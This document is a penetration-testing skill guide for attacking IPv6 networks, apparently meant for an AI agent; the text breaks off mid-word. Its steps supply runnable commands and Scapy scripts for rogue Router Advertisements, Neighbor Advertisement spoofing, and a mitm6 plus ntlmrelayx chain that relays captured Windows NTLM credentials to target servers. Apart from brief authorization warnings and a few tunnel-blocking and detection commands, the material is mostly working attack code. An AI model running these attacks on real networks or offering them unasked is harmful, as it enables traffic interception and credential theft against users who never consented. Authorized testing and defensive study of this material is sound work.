exploiting-ipv6-vulnerabilities

What this skill does

# Exploiting IPv6 Vulnerabilities

## When to Use

- Testing whether dual-stack networks have consistent security controls for both IPv4 and IPv6 traffic
- Demonstrating risks from unmanaged IPv6 on networks where only IPv4 is officially supported
- Exploiting SLAAC and Router Advertisement mechanisms to perform man-in-the-middle attacks via IPv6
- Testing IPv6-aware firewall rules and IDS/IPS detection for IPv6-specific attack patterns
- Identifying IPv6 tunneling protocols (6to4, Teredo, ISATAP) that bypass IPv4-only security controls

**Do not use** on production networks without written authorization, against systems where IPv6 disruption could cause safety issues, or for denial-of-service attacks against network infrastructure.

## Prerequisites

- Written authorization specifying IPv6 testing scope and approved techniques
- Kali Linux with THC-IPv6 toolkit, Scapy, and mitm6 installed
- Network interface with IPv6 support on the target network segment
- Understanding of IPv6 addressing, SLAAC, NDP, and Router Advertisements
- Wireshark for capturing and analyzing IPv6 traffic

## Workflow

### Step 1: Enumerate IPv6 on the Network

```bash
# Check if IPv6 is enabled on the local interface
ip -6 addr show

# Discover IPv6 hosts on the local link using multicast
ping6 -c 3 ff02::1%eth0
# ff02::1 = all-nodes multicast address

# Use alive6 from THC-IPv6 toolkit to discover hosts
sudo alive6 eth0

# Scan for IPv6-enabled hosts with Nmap
nmap -6 --script ipv6-multicast-mld-list -e eth0
nmap -6 -sn --script targets-ipv6-multicast-echo -e eth0

# Check for Router Advertisements on the network
sudo tcpdump -i eth0 -n -v icmp6 and 'ip6[40] == 134'
# Type 134 = Router Advertisement

# Use radvdump to capture existing RAs
sudo radvdump

# Check for DHCPv6 servers
sudo dhclient -6 -v eth0 --request-only
```

### Step 2: Perform SLAAC-Based MITM Attack with mitm6

```bash
# mitm6 exploits the default behavior of Windows machines to request
# IPv6 configuration via DHCPv6 when a Router Advertisement is seen

# Start mitm6 to become the IPv6 DNS server
sudo mitm6 -d example.com -i eth0

# mitm6 performs the following:
# 1. Sends Router Advertisements to enable IPv6 on victims
# 2. Responds to DHCPv6 requests, assigning itself as DNS server
# 3. Victims now send DNS queries to the attacker over IPv6
# 4. Attacker can respond with spoofed DNS replies

# Combine with ntlmrelayx for credential relay
sudo impacket-ntlmrelayx -6 -tf targets.txt -wh fake-wpad.example.com -l /tmp/loot

# This exploits:
# 1. WPAD (Web Proxy Auto-Discovery) via DNS
# 2. Windows sends NTLM authentication to the WPAD proxy
# 3. ntlmrelayx relays the credentials to target servers
```

### Step 3: Router Advertisement Spoofing

```python
#!/usr/bin/env python3
"""Rogue Router Advertisement for authorized IPv6 testing."""

from scapy.all import *
from scapy.layers.inet6 import *

# Craft a Router Advertisement packet
# This makes the attacker appear as the default IPv6 router

iface = "eth0"
attacker_mac = get_if_hwaddr(iface)
attacker_ipv6 = get_if_addr6(iface)

ra = (
    Ether(dst="33:33:00:00:00:01") /  # All-nodes multicast
    IPv6(src=attacker_ipv6, dst="ff02::1") /
    ICMPv6ND_RA(
        routerlifetime=1800,     # Advertise as router for 30 min
        prf=1,                   # High preference
        M=0,                     # No managed flag (use SLAAC)
        O=1                      # Other config via DHCPv6 (DNS)
    ) /
    ICMPv6NDOptSrcLLAddr(lladdr=attacker_mac) /
    ICMPv6NDOptPrefixInfo(
        prefix="2001:db8:dead::",  # Rogue prefix
        prefixlen=64,
        L=1,
        A=1,
        validlifetime=3600,
        preferredlifetime=1800
    ) /
    ICMPv6NDOptRDNSS(
        dns=[attacker_ipv6],  # Attacker as DNS server
        lifetime=1800
    )
)

print(f"[*] Sending rogue Router Advertisement from {attacker_ipv6}")
print(f"[*] Advertising prefix 2001:db8:dead::/64")
sendp(ra, iface=iface, count=5, inter=2)
print("[*] RA packets sent. Victims will configure IPv6 with rogue prefix.")
```

### Step 4: IPv6 Neighbor Discovery Attacks

```bash
# Neighbor Advertisement spoofing (IPv6 equivalent of ARP spoofing)
# Using THC-IPv6 parasite6 tool
sudo parasite6 eth0

# Or craft with Scapy
python3 << 'PYEOF'
from scapy.all import *
from scapy.layers.inet6 import *

# Spoof Neighbor Advertisement to redirect traffic
target_ipv6 = "2001:db8::50"    # Victim IPv6 address
gateway_ipv6 = "2001:db8::1"    # Gateway IPv6 address
attacker_mac = get_if_hwaddr("eth0")

# Tell the victim that we are the gateway
na = (
    Ether(dst="33:33:00:00:00:01") /
    IPv6(src=gateway_ipv6, dst="ff02::1") /
    ICMPv6ND_NA(
        tgt=gateway_ipv6,
        R=1, S=0, O=1  # Router flag, Override flag
    ) /
    ICMPv6NDOptDstLLAddr(lladdr=attacker_mac)
)

print("[*] Sending spoofed Neighbor Advertisements...")
sendp(na, iface="eth0", count=100, inter=1)
PYEOF

# Detect NDP spoofing with ndpmon
sudo ndpmon -i eth0
```

### Step 5: IPv6 Tunnel Detection and Exploitation

```bash
# Detect Teredo tunnels (IPv6 over UDP port 3544)
sudo tshark -i eth0 -Y "udp.port == 3544" -T fields -e ip.src -e ip.dst

# Detect 6to4 tunnels (protocol 41)
sudo tshark -i eth0 -Y "ip.proto == 41" -T fields -e ip.src -e ip.dst

# Detect ISATAP tunnels
sudo tshark -i eth0 -Y "ip.proto == 41 and ipv6.dst contains \"::5efe:\"" -c 10

# Scan for Teredo-enabled hosts
nmap -6 -sU -p 3544 --open 10.10.0.0/24

# Test if IPv6 tunnels bypass IPv4 firewall rules
# If Teredo is allowed, IPv6 traffic can bypass IPv4-only firewalls
curl -6 http://[2001:db8::50]:8080/  # Access via IPv6 tunnel

# Block unwanted IPv6 tunnels at the firewall
# iptables: block protocol 41 (6to4, ISATAP) and Teredo
sudo iptables -A INPUT -p 41 -j DROP
sudo iptables -A OUTPUT -p 41 -j DROP
sudo iptables -A INPUT -p udp --dport 3544 -j DROP
sudo iptables -A OUTPUT -p udp --dport 3544 -j DROP
```

### Step 6: Test IPv6 Firewall Rules and Document

```bash
# Verify ip6tables rules are in place
sudo ip6tables -L -n -v

# Test if IPv6 firewall mirrors IPv4 rules
# Common oversight: IPv4 firewall is strict, IPv6 is wide open
nmap -6 -sS -p- <target_ipv6_address>

# Compare IPv4 and IPv6 scan results
nmap -sS -p 1-1024 10.10.20.10 -oA ipv4_scan
nmap -6 -sS -p 1-1024 2001:db8::10 -oA ipv6_scan
diff <(grep "open" ipv4_scan.nmap) <(grep "open" ipv6_scan.nmap)

# Check for IPv6 RA Guard on the switch
# Cisco: show ipv6 snooping policies
# If not enabled, document as finding

# Clean up: stop all IPv6 attack tools
sudo killall mitm6 parasite6 2>/dev/null
```

## Key Concepts

| Term | Definition |
|------|------------|
| **SLAAC (Stateless Address Autoconfiguration)** | IPv6 mechanism where hosts automatically configure addresses from Router Advertisements without a DHCP server, exploitable by rogue RA injection |
| **Router Advertisement (RA)** | ICMPv6 message from routers announcing network prefixes, default gateway, and DNS configuration; rogue RAs enable MITM attacks |
| **NDP (Neighbor Discovery Protocol)** | IPv6 replacement for ARP that uses ICMPv6 for address resolution, router discovery, and duplicate address detection; vulnerable to spoofing |
| **mitm6** | Tool that exploits Windows DHCPv6 preference to become the IPv6 DNS server, enabling DNS spoofing and NTLM credential relay |
| **RA Guard** | Switch-level security feature that filters rogue Router Advertisements, preventing unauthorized hosts from acting as IPv6 routers |
| **IPv6 Tunneling** | Encapsulation of IPv6 packets within IPv4 (6to4, Teredo, ISATAP) that can bypass IPv4-only security controls and firewalls |

## Tools & Systems

- **mitm6**: IPv6 MITM tool that exploits SLAAC and DHCPv6 to become the DNS server for Windows hosts
- **THC-IPv6 Toolkit**: Comprehensive IPv6 attack toolkit including alive6, parasite6, fake_router6, and flood tools
- **Scapy**: Python packet manipulation for crafting custom ICMPv6 Router Advertisements and Neighbor Discovery packets
- **ndpmon**: IPv6 Neighb